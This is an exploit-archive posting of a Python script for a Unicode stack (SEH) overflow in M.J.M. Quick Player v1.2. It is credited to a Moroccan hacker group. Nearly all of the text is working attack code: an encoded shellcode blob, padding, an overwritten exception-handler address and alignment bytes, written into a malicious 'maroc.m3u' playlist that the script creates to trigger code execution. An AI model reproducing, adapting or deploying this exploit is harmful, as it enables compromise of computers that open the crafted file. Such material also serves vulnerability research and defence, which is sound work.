M.J.M. Quick Player v1.2 Unicode Stack overflow exploit

=======================================================
M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
=======================================================


#!/usr/bin/python
#
#   M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
# by :     Molotov From Privat Team Hackers of Morocco

# Reference: http://inj3ct0r.com/exploits/8217
 
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB" 
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX" 
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7" 
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP" 
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4" 
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K" 
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM" 
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU" 
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC" 
"QQ2LRCM0LJA" 
)
 
buffer = "\x41"*536     # junk
 
buffer+="\x41\x6D" 
buffer+="\x41\x4D"  # SE Handler (unicode format = 0x004A0059)
 
buffer+= '\x58\x6d'
buffer+= '\x05\x02\x22\x6d'
buffer+= '\x2d\x12\x22\x6d'
buffer+= '\x50\x6d\xc3'
 
buffer+='A' * 1495  # some mo' padding to please my eyes
buffer+= shellcode
buffer+= 'A' * (3000-len(shellcode)-1495)
 
 
f = open("maroc.m3u", "w")
f.write(buffer)
f.close()
 
print "[*] File created !"



#  0day.today [2018-01-04]  #